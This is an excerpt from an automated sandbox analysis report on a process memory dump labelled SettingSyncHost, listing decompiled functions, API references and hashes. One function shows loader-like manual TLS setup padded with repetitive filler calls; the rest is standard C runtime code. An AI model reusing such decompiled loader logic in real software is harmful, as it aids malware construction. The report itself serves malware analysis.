Opcode ID: 37528f6ffb8151b48564a9c49da162f5a9658b2453d18a6e858b05679dc7197d
Instruction ID: bd6e34ef6860f06c24d7ccd5e3245b69eb89a29864bde3de27c167d8c58d4353
Opcode Fuzzy Hash: 37528f6ffb8151b48564a9c49da162f5a9658b2453d18a6e858b05679dc7197d
Instruction Fuzzy Hash: BCF01231A0115DFBDB219B56DD09BAE7A79EF0079AF100051A505A15A0CF748E42FB91

Uniqueness

Uniqueness Score: -1.00%

Function 00F91BE0, Relevance: 7.7, APIs: 5, Instructions: 230
memoryCOMMON

Download Yara Rule

C-Code - Quality: 29%

			E00F91BE0(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4) {
				void* _v12;
				intOrPtr _v24;
				intOrPtr _v36;
				intOrPtr _v48;
				intOrPtr* _v60;
				void _v260;
				intOrPtr _t56;
				void* _t57;
				long _t75;
				int _t77;
				void* _t83;
				intOrPtr _t93;
				void* _t117;
				void* _t133;
				void* _t134;
				long long* _t136;
				void* _t137;
				long long* _t138;
				long long* _t140;
				void* _t141;
				long long* _t142;
				void* _t143;
				long long* _t144;
				long long* _t147;
				void* _t148;
				long long* _t149;
				void* _t150;
				long long* _t151;
				void* _t152;
				long long* _t153;
				long long* _t155;
				void* _t156;
				long long* _t157;
				long long _t161;
				long long _t162;
				long long _t163;
				long long _t164;
				long long _t165;
				long long _t166;
				long long _t167;
				long long _t168;
				long long _t169;
				long long _t170;
				long long _t171;

				_t117 = __edx;
				memset( &_v260, 0xcccccccc, 0x40 << 2);
				_v48 = _a4 +  *((intOrPtr*)(_a4 + 0x3c));
				_v60 = _a4 +  *((intOrPtr*)(_v48 + 0xc0));
				_t136 = _t134 + 0xc - 8;
				_t161 =  *0xfbbc50;
				 *_t136 = _t161;
				E00F93700(_t117);
				 *_t136 = _t161;
				E00F935B0(_t117);
				 *_t136 = _t161;
				E00F93460(_t117);
				 *_t136 = _t161;
				E00F93340();
				st0 = _t161;
				_t137 = _t136 + 8;
				if(_v60 != _a4) {
					_t138 = _t137 - 8;
					_t162 =  *0xfbbc50;
					 *_t138 = _t162;
					E00F93700(_t117);
					 *_t138 = _t162;
					E00F935B0(_t117);
					 *_t138 = _t162;
					E00F93460(_t117);
					 *_t138 = _t162;
					E00F93340();
					st0 = _t162;
					_t140 = _t138 + 8 - 8;
					_t163 =  *0xfbbc50;
					 *_t140 = _t163;
					E00F93700(_t117);
					 *_t140 = _t163;
					E00F935B0(_t117);
					 *_t140 = _t163;
					E00F93460(_t117);
					 *_t140 = _t163;
					E00F93340();
					st0 = _t163;
					_t141 = _t140 + 8;
					_t56 = _v60;
					_t119 =  *((intOrPtr*)(_t56 + 4)) -  *_v60;
					_t57 = VirtualAlloc(0,  *((intOrPtr*)(_t56 + 4)) -  *_v60, 0x1000, 4);
					__eflags = _t141 - _t141;
					_v12 = E00F931A1(_t57, _t141 - _t141);
					_t142 = _t141 - 8;
					_t164 =  *0xfbbc50;
					 *_t142 = _t164;
					E00F93700( *((intOrPtr*)(_t56 + 4)) -  *_v60);
					 *_t142 = _t164;
					E00F935B0( *((intOrPtr*)(_t56 + 4)) -  *_v60);
					 *_t142 = _t164;
					E00F93460(_t119);
					 *_t142 = _t164;
					E00F93340();
					st0 = _t164;
					_t143 = _t142 + 8;
					__eflags = _v12;
					if(__eflags != 0) {
						_t144 = _t143 - 8;
						_t165 =  *0xfbbc50;
						 *_t144 = _t165;
						E00F93700(_t119);
						 *_t144 = _t165;
						E00F935B0(_t119);
						 *_t144 = _t165;
						E00F93460(_t119);
						 *_t144 = _t165;
						E00F93340();
						st0 = _t165;
						_t122 = _v12;
						E00F938C0(_v12,  *_v60,  *((intOrPtr*)(_v60 + 4)) -  *_v60);
						_t147 = _t144 + 0x14 - 8;
						_t166 =  *0xfbbc50;
						 *_t147 = _t166;
						E00F93700(_v12);
						 *_t147 = _t166;
						E00F935B0(_v12);
						 *_t147 = _t166;
						E00F93460(_t122);
						 *_t147 = _t166;
						E00F93340();
						st0 = _t166;
						_t148 = _t147 + 8;
						_t75 = TlsAlloc();
						__eflags = _t148 - _t148;
						_t77 = TlsSetValue(E00F931A1(_t75, _t148 - _t148), _v12);
						__eflags = _t148 - _t148;
						E00F931A1(_t77, _t148 - _t148);
						_t149 = _t148 - 8;
						_t167 =  *0xfbbc50;
						 *_t149 = _t167;
						E00F93700(_t122);
						 *_t149 = _t167;
						E00F935B0(_t122);
						 *_t149 = _t167;
						E00F93460(_t122);
						 *_t149 = _t167;
						E00F93340();
						st0 = _t167;
						_t150 = _t149 + 8;
						_t83 = VirtualAlloc(0, 0x1100, 0x1000, 4);
						__eflags = _t150 - _t150;
						_v24 = E00F931A1(_t83, _t150 - _t150);
						_t151 = _t150 - 8;
						_t168 =  *0xfbbc50;
						 *_t151 = _t168;
						E00F93700(_t122);
						 *_t151 = _t168;
						E00F935B0(_t122);
						 *_t151 = _t168;
						E00F93460(_t122);
						 *_t151 = _t168;
						_t88 = E00F93340();
						st0 = _t168;
						_t152 = _t151 + 8;
						__eflags = _v24;
						if(__eflags != 0) {
							_t153 = _t152 - 8;
							_t169 =  *0xfbbc50;
							 *_t153 = _t169;
							E00F93700(_t122);
							 *_t153 = _t169;
							E00F935B0(_t122);
							 *_t153 = _t169;
							E00F93460(_t122);
							 *_t153 = _t169;
							E00F93340();
							st0 = _t169;
							_t93 = _v60;
							_t123 =  *((intOrPtr*)( *((intOrPtr*)(_t93 + 8))));
							_v36 =  *((intOrPtr*)( *((intOrPtr*)(_t93 + 8))));
							_t155 = _t153 + 8 - 8;
							_t170 =  *0xfbbc50;
							 *_t155 = _t170;
							E00F93700( *((intOrPtr*)( *((intOrPtr*)(_t93 + 8)))));
							 *_t155 = _t170;
							E00F935B0( *((intOrPtr*)( *((intOrPtr*)(_t93 + 8)))));
							 *_t155 = _t170;
							E00F93460(_t123);
							 *_t155 = _t170;
							E00F93340();
							st0 = _t170;
							_t156 = _t155 + 8;
							__eflags = _v36 - 0xffffffff;
							if(_v36 != 0xffffffff) {
								_v260 = _v36;
							} else {
								_v260 = 0;
							}
							_t124 = _v24;
							 *(_v24 + _v260 * 4) = _v12;
							_t157 = _t156 - 8;
							_t171 =  *0xfbbc50;
							 *_t157 = _t171;
							E00F93700(_v24);
							 *_t157 = _t171;
							E00F935B0(_t124);
							 *_t157 = _t171;
							E00F93460(_t124);
							 *_t157 = _t171;
							E00F93340();
							st0 = _t171;
							_t152 = _t157 + 8;
							_t88 = _v24;
							 *[fs:0x2c] = _v24;
						}
					}
				}
				return E00F931A1(_t88, _t133 - _t152 + 0x100);
			}

0x00f91be0
0x00f91bfc
0x00f91c07
0x00f91c16
0x00f91c19
0x00f91c1c
0x00f91c22
0x00f91c25
0x00f91c2a
0x00f91c2d
0x00f91c32
0x00f91c35
0x00f91c3a
0x00f91c3d
0x00f91c42
0x00f91c44
0x00f91c4d
0x00f91c54
0x00f91c57
0x00f91c5d
0x00f91c60
0x00f91c65
0x00f91c68
0x00f91c6d
0x00f91c70
0x00f91c75
0x00f91c78
0x00f91c7d
0x00f91c82
0x00f91c85
0x00f91c8b
0x00f91c8e
0x00f91c93
0x00f91c96
0x00f91c9b
0x00f91c9e
0x00f91ca3
0x00f91ca6
0x00f91cab
0x00f91cad
0x00f91cb9
0x00f91cc2
0x00f91cc7
0x00f91ccd
0x00f91cd4
0x00f91cd7
0x00f91cda
0x00f91ce0
0x00f91ce3
0x00f91ce8
0x00f91ceb
0x00f91cf0
0x00f91cf3
0x00f91cf8
0x00f91cfb
0x00f91d00
0x00f91d02
0x00f91d05
0x00f91d09
0x00f91d10
0x00f91d13
0x00f91d19
0x00f91d1c
0x00f91d21
0x00f91d24
0x00f91d29
0x00f91d2c
0x00f91d31
0x00f91d34
0x00f91d39
0x00f91d50
0x00f91d54
0x00f91d5c
0x00f91d5f
0x00f91d65
0x00f91d68
0x00f91d6d
0x00f91d70
0x00f91d75
0x00f91d78
0x00f91d7d
0x00f91d80
0x00f91d85
0x00f91d87
0x00f91d92
0x00f91d98
0x00f91da0
0x00f91da6
0x00f91da8
0x00f91dad
0x00f91db0
0x00f91db6
0x00f91db9
0x00f91dbe
0x00f91dc1
0x00f91dc6
0x00f91dc9
0x00f91dce
0x00f91dd1
0x00f91dd6
0x00f91dd8
0x00f91deb
0x00f91df1
0x00f91df8
0x00f91dfb
0x00f91dfe
0x00f91e04
0x00f91e07
0x00f91e0c
0x00f91e0f
0x00f91e14
0x00f91e17
0x00f91e1c
0x00f91e1f
0x00f91e24
0x00f91e26
0x00f91e29
0x00f91e2d
0x00f91e34
0x00f91e37
0x00f91e3d
0x00f91e40
0x00f91e45
0x00f91e48
0x00f91e4d
0x00f91e50
0x00f91e55
0x00f91e58
0x00f91e5d
0x00f91e62
0x00f91e68
0x00f91e6a
0x00f91e6d
0x00f91e70
0x00f91e76
0x00f91e79
0x00f91e7e
0x00f91e81
0x00f91e86
0x00f91e89
0x00f91e8e
0x00f91e91
0x00f91e96
0x00f91e98
0x00f91e9b
0x00f91e9f
0x00f91eb0
0x00f91ea1
0x00f91ea1
0x00f91ea1
0x00f91ebc
0x00f91ec2
0x00f91ec5
0x00f91ec8
0x00f91ece
0x00f91ed1
0x00f91ed6
0x00f91ed9
0x00f91ede
0x00f91ee1
0x00f91ee6
0x00f91ee9
0x00f91eee
0x00f91ef0
0x00f91ef3
0x00f91ef6
0x00f91ef6
0x00f91e2d
0x00f91d09
0x00f91f0f

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00F91CC7

Memory Dump Source

Source File: 00000004.00000002.1300746726.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000004.00000002.1300725591.0000000000F90000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300850176.0000000000FBB000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300877417.0000000000FC5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300893530.0000000000FC7000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.1300907437.0000000000FC8000.00000040.00020000.sdmp Download File
Associated: 00000004.00000002.1301073357.00000000010EE000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301085124.00000000010F0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301106256.00000000010F1000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f90000_SettingSyncHost.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 75bbccc6bf50e9dd3a71589b201947e4fe52120966ff3f2cbff8c2ec5f825cba
Instruction ID: ff1067eac9990936a8b186f707b351355631fa3b9ca6a4eb3b98cbdf7c576ae3
Opcode Fuzzy Hash: 75bbccc6bf50e9dd3a71589b201947e4fe52120966ff3f2cbff8c2ec5f825cba
Instruction Fuzzy Hash: CF813FB0908509DAEF05BF68EC8A56CFFB0FF48715F1149A8F4C052291DF350A689B5A

Uniqueness

Uniqueness Score: -1.00%

Function 00FE28D8, Relevance: 7.7, APIs: 5, Instructions: 186COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00FE5CF9: RtlAllocateHeap.NTDLL(00000000,?,?,?,00FDB376,?,?,?,00000000,?,00FCB0A7,?,?,?), ref: 00FE5D2B

_free.LIBCMT ref: 00FE29E7
_free.LIBCMT ref: 00FE29FE
_free.LIBCMT ref: 00FE2A1B
_free.LIBCMT ref: 00FE2A36
_free.LIBCMT ref: 00FE2A4D

Memory Dump Source

Source File: 00000004.00000002.1300907437.0000000000FC8000.00000040.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000004.00000002.1300725591.0000000000F90000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300746726.0000000000F91000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.1300850176.0000000000FBB000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300877417.0000000000FC5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300893530.0000000000FC7000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.1301073357.00000000010EE000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301085124.00000000010F0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301106256.00000000010F1000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f90000_SettingSyncHost.jbxd

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: cb5b5fa02927a11d1178a9712d73bde48043bb56aa040ee33cff059f58f8528d
Instruction ID: 27aa9661b1a9b5c097acd686563f7f62f3e77b1da12e7ac0d9dcae1517eac4b8
Opcode Fuzzy Hash: cb5b5fa02927a11d1178a9712d73bde48043bb56aa040ee33cff059f58f8528d
Instruction Fuzzy Hash: FB51C472A007449FDB61DF2ACC41A6A77F9FF48B20F144569E805DB291E735DA01EB40

Uniqueness

Uniqueness Score: -1.00%

Function 00FD0640, Relevance: 7.6, APIs: 5, Instructions: 107COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00FD0676
std::_Lockit::_Lockit.LIBCPMT ref: 00FD0696
std::_Lockit::~_Lockit.LIBCPMT ref: 00FD06B6
std::_Facet_Register.LIBCPMT ref: 00FD0751
std::_Lockit::~_Lockit.LIBCPMT ref: 00FD0769

Memory Dump Source

Source File: 00000004.00000002.1300907437.0000000000FC8000.00000040.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000004.00000002.1300725591.0000000000F90000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300746726.0000000000F91000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.1300850176.0000000000FBB000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300877417.0000000000FC5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300893530.0000000000FC7000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.1301073357.00000000010EE000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301085124.00000000010F0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301106256.00000000010F1000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f90000_SettingSyncHost.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: 125bc7174a1111a38ebc049cb0e8d5eec0cb506a8e67b65b85bacc3c164b9ea8
Instruction ID: 45f6c40b5c1f5ebb4145dabf5f2616ac05361aacc84f43bdd458044f45d010b5
Opcode Fuzzy Hash: 125bc7174a1111a38ebc049cb0e8d5eec0cb506a8e67b65b85bacc3c164b9ea8
Instruction Fuzzy Hash: 2541DD71A00219CFCB21DF94C981B6EB7B6FB44720F18415EE846AB381DF79AD45DB80

Uniqueness

Uniqueness Score: -1.00%

Function 00FA2A01, Relevance: 7.6, APIs: 5, Instructions: 68
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 94%

			E00FA2A01(void* __edx, void* __edi, void* __esi, void* _a4, long _a8) {
				void* _t7;
				long _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				long _t27;
				long _t30;

				if(_a4 != 0) {
					_push(__esi);
					_t30 = _a8;
					__eflags = _t30;
					if(_t30 != 0) {
						_push(__edi);
						while(1) {
							__eflags = _t30 - 0xffffffe0;
							if(_t30 > 0xffffffe0) {
								break;
							}
							__eflags = _t30;
							if(_t30 == 0) {
								_t30 = _t30 + 1;
								__eflags = _t30;
							}
							_t7 = HeapReAlloc( *0x10ee3c8, 0, _a4, _t30);
							_t27 = _t7;
							__eflags = _t27;
							if(_t27 != 0) {
								L17:
								_t8 = _t27;
							} else {
								__eflags =  *0x10ee414 - _t7;
								if(__eflags == 0) {
									_t9 = E00F9960F(__eflags);
									 *_t9 = E00F995CD(GetLastError());
									goto L17;
								} else {
									__eflags = E00FACA78(_t7, _t30);
									if(__eflags == 0) {
										_t12 = E00F9960F(__eflags);
										 *_t12 = E00F995CD(GetLastError());
										L12:
										_t8 = 0;
										__eflags = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E00FACA78(_t6, _t30);
						 *((intOrPtr*)(E00F9960F(__eflags))) = 0xc;
						goto L12;
					} else {
						E00F99DFA(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E00FA28EB(__edx, __edi, __esi, _a8);
				}
			}

0x00fa2a0a
0x00fa2a17
0x00fa2a18
0x00fa2a1b
0x00fa2a1d
0x00fa2a2c
0x00fa2a5f
0x00fa2a5f
0x00fa2a62
0x00000000
0x00000000
0x00fa2a2f
0x00fa2a31
0x00fa2a33
0x00fa2a33
0x00fa2a33
0x00fa2a40
0x00fa2a46
0x00fa2a48
0x00fa2a4a
0x00fa2aaa
0x00fa2aaa
0x00fa2a4c
0x00fa2a4c
0x00fa2a52
0x00fa2a94
0x00fa2aa8
0x00000000
0x00fa2a54
0x00fa2a5b
0x00fa2a5d
0x00fa2a7c
0x00fa2a90
0x00fa2a76
0x00fa2a76
0x00fa2a76
0x00000000
0x00000000
0x00000000
0x00fa2a5d
0x00fa2a52
0x00000000
0x00fa2a78
0x00fa2a65
0x00fa2a70
0x00000000
0x00fa2a1f
0x00fa2a22
0x00fa2a28
0x00fa2a28
0x00fa2a79
0x00fa2a7b
0x00fa2a0c
0x00fa2a16
0x00fa2a16

APIs

_malloc.LIBCMT ref: 00FA2A0F

Part of subcall function 00FA28EB: __FF_MSGBANNER.LIBCMT ref: 00FA2904
Part of subcall function 00FA28EB: __NMSG_WRITE.LIBCMT ref: 00FA290B
Part of subcall function 00FA28EB: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,00F9A7CB,00000001,00000001,00000001,?,00F99D52,00000018,00FC5EC8,0000000C,00F99DE2), ref: 00FA2930

_free.LIBCMT ref: 00FA2A22

Memory Dump Source

Source File: 00000004.00000002.1300746726.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000004.00000002.1300725591.0000000000F90000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300850176.0000000000FBB000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300877417.0000000000FC5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300893530.0000000000FC7000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.1300907437.0000000000FC8000.00000040.00020000.sdmp Download File
Associated: 00000004.00000002.1301073357.00000000010EE000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301085124.00000000010F0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301106256.00000000010F1000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f90000_SettingSyncHost.jbxd

Similarity

API ID: AllocHeap_free_malloc
String ID:
API String ID: 2734353464-0
Opcode ID: 34e10a0c6f2e331e64bd51c34ccc23ba3f23656b6c1e83afadf684c925c37c5f
Instruction ID: 9cc5fddb838f09bc556461f7d7eb4127f568eec1cddf03bae5c97725064171b3
Opcode Fuzzy Hash: 34e10a0c6f2e331e64bd51c34ccc23ba3f23656b6c1e83afadf684c925c37c5f
Instruction Fuzzy Hash: 33119472A04215ABDF716F7DAC0566A37E9AF46370F224029F888DA156DF7D8840BB90

Uniqueness

Uniqueness Score: -1.00%

Function 00FEC951, Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00FEC969

Part of subcall function 00FE5CBF: RtlFreeHeap.NTDLL(00000000,00000000,?,00FECBF2,00FCB0A7,00000000,00FCB0A7,?,?,00FECE95,00FCB0A7,00000007,00FCB0A7,?,00FED48B,00FCB0A7), ref: 00FE5CD5
Part of subcall function 00FE5CBF: GetLastError.KERNEL32(00FCB0A7,?,00FECBF2,00FCB0A7,00000000,00FCB0A7,?,?,00FECE95,00FCB0A7,00000007,00FCB0A7,?,00FED48B,00FCB0A7,00FCB0A7), ref: 00FE5CE7

_free.LIBCMT ref: 00FEC97B
_free.LIBCMT ref: 00FEC98D
_free.LIBCMT ref: 00FEC99F
_free.LIBCMT ref: 00FEC9B1

Memory Dump Source

Source File: 00000004.00000002.1300907437.0000000000FC8000.00000040.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000004.00000002.1300725591.0000000000F90000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300746726.0000000000F91000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.1300850176.0000000000FBB000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300877417.0000000000FC5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300893530.0000000000FC7000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.1301073357.00000000010EE000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301085124.00000000010F0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301106256.00000000010F1000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f90000_SettingSyncHost.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 3534366f3223055620b9ed5280557f9e62c042acc27a5d34a08edc50bdd2b8ed
Instruction ID: b981d8affebe5dedf12a35b38ec0f2a11e340d5e08cf13497881218427c8a6db
Opcode Fuzzy Hash: 3534366f3223055620b9ed5280557f9e62c042acc27a5d34a08edc50bdd2b8ed
Instruction Fuzzy Hash: 78F06832D06B90A7C661EF6AF581C1E77D9BA0472076C5C06F489D7705CB39FC4157A4

Uniqueness

Uniqueness Score: -1.00%

Function 00F99554, Relevance: 7.5, APIs: 5, Instructions: 34
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 90%

			E00F99554(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t12;
				void* _t28;
				intOrPtr _t29;
				void* _t30;
				void* _t31;

				_t31 = __eflags;
				_t26 = __edi;
				_t25 = __edx;
				_t20 = __ebx;
				_push(0xc);
				_push(0xfc5e58);
				E00F9A560(__ebx, __edi, __esi);
				_t28 = E00F998D1(__ebx, __edx, _t31);
				_t12 =  *0xfc72f4; // 0xfffffffe
				if(( *(_t28 + 0x70) & _t12) == 0) {
					L6:
					E00F99DC7(_t20, _t26, 0xc);
					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
					_t29 = _t28 + 0x6c;
					 *((intOrPtr*)(_t30 - 0x1c)) = E00F99507(_t29,  *0xfc72e8);
					 *(_t30 - 4) = 0xfffffffe;
					E00F995C1();
				} else {
					_t33 =  *((intOrPtr*)(_t28 + 0x6c));
					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t29 =  *((intOrPtr*)(E00F998D1(_t20, __edx, _t33) + 0x6c));
					}
				}
				_t34 = _t29;
				if(_t29 == 0) {
					E00FA235F(_t25, _t34, 0x20);
				}
				return E00F9A5A5(_t29);
			}

0x00f99554
0x00f99554
0x00f99554
0x00f99554
0x00f99554
0x00f99556
0x00f9955b
0x00f99565
0x00f99567
0x00f9956f
0x00f99593
0x00f99595
0x00f9959b
0x00f995a5
0x00f995b0
0x00f995b3
0x00f995ba
0x00f99571
0x00f99571
0x00f99575
0x00000000
0x00f99577
0x00f9957c
0x00f9957c
0x00f99575
0x00f9957f
0x00f99581
0x00f99585
0x00f9958a
0x00f99592

APIs

__getptd.LIBCMT ref: 00F99560

Part of subcall function 00F998D1: __getptd_noexit.LIBCMT ref: 00F998D4
Part of subcall function 00F998D1: __amsg_exit.LIBCMT ref: 00F998E1

__getptd.LIBCMT ref: 00F99577
__amsg_exit.LIBCMT ref: 00F99585
__lock.LIBCMT ref: 00F99595
__updatetlocinfoEx_nolock.LIBCMT ref: 00F995A9

Memory Dump Source

Source File: 00000004.00000002.1300746726.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000004.00000002.1300725591.0000000000F90000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300850176.0000000000FBB000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300877417.0000000000FC5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300893530.0000000000FC7000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.1300907437.0000000000FC8000.00000040.00020000.sdmp Download File
Associated: 00000004.00000002.1301073357.00000000010EE000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301085124.00000000010F0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301106256.00000000010F1000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f90000_SettingSyncHost.jbxd

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: c09764083bd6941edfd68985928f599ddf40afe421c1b21aa38708f7d576fa8e
Instruction ID: 3c187382c0892ebb98442d2fa745a64cbd15c14a34da0ad7dfbe615f5757e592
Opcode Fuzzy Hash: c09764083bd6941edfd68985928f599ddf40afe421c1b21aa38708f7d576fa8e
Instruction Fuzzy Hash: 4FF06D32E0C7149AFE26BB6C9C03B4E32D0AF00720F5B010DF558A61D2DBA85941BA56

Uniqueness

Uniqueness Score: -1.00%

Function 00FCB9C0, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 77COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00FCBA5F

Part of subcall function 00FDB5C4: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,00000000,?,00FD9D7C,?,0100752C,?), ref: 00FDB624

Strings

ios_base::failbit set, xrefs: 00FCBA01
ios_base::eofbit set, xrefs: 00FCBA06
ios_base::badbit set, xrefs: 00FCB9F7, 00FCBA22, 00FCBA43

Memory Dump Source

Source File: 00000004.00000002.1300907437.0000000000FC8000.00000040.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000004.00000002.1300725591.0000000000F90000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300746726.0000000000F91000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.1300850176.0000000000FBB000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300877417.0000000000FC5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300893530.0000000000FC7000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.1301073357.00000000010EE000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301085124.00000000010F0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301106256.00000000010F1000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f90000_SettingSyncHost.jbxd

Similarity

API ID: ExceptionRaise___std_exception_copy
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 3109751735-1866435925
Opcode ID: 3d4cf08c8e74de0481c405c87cf8465b6c84dfdfebca988a01a656a3c2659574
Instruction ID: dd93858131d1a0956982f3bafc686e6040b1b2f77367ec00896c1143dd2ac7f2
Opcode Fuzzy Hash: 3d4cf08c8e74de0481c405c87cf8465b6c84dfdfebca988a01a656a3c2659574
Instruction Fuzzy Hash: E511D5B79007096BC710DF59D843F9AB3DCAF05320F08862AFA54DB681FB75A904D7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00FE6187, Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00FE6211

Memory Dump Source

Source File: 00000004.00000002.1300907437.0000000000FC8000.00000040.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000004.00000002.1300725591.0000000000F90000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300746726.0000000000F91000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.1300850176.0000000000FBB000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300877417.0000000000FC5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300893530.0000000000FC7000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.1301073357.00000000010EE000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301085124.00000000010F0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301106256.00000000010F1000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f90000_SettingSyncHost.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: e4434689af5d7507191034382108cbcd03bb8f4a4d6b612f1e0e7a139dc4b027
Instruction ID: ffddc68500c7c5d65df4ffba6f60c74c6127e5404bc982947acb139ee254dd5e
Opcode Fuzzy Hash: e4434689af5d7507191034382108cbcd03bb8f4a4d6b612f1e0e7a139dc4b027
Instruction Fuzzy Hash: AFB14632D002C99FDB11CF69C8817AEBBE5EF65390F244169E955DB382D6349D01E760

Uniqueness

Uniqueness Score: -1.00%

Function 00FE5A10, Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00FDE7AE,?,?,00000000,?,00FDE33E,?,?,?), ref: 00FE5A15
_free.LIBCMT ref: 00FE5A72
_free.LIBCMT ref: 00FE5AA8
SetLastError.KERNEL32(00000000,00000006,000000FF,?,00000000,?,00FDE33E,?,?,?), ref: 00FE5AB3

Memory Dump Source

Source File: 00000004.00000002.1300907437.0000000000FC8000.00000040.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000004.00000002.1300725591.0000000000F90000.00000002.00020000.sdmp Download File
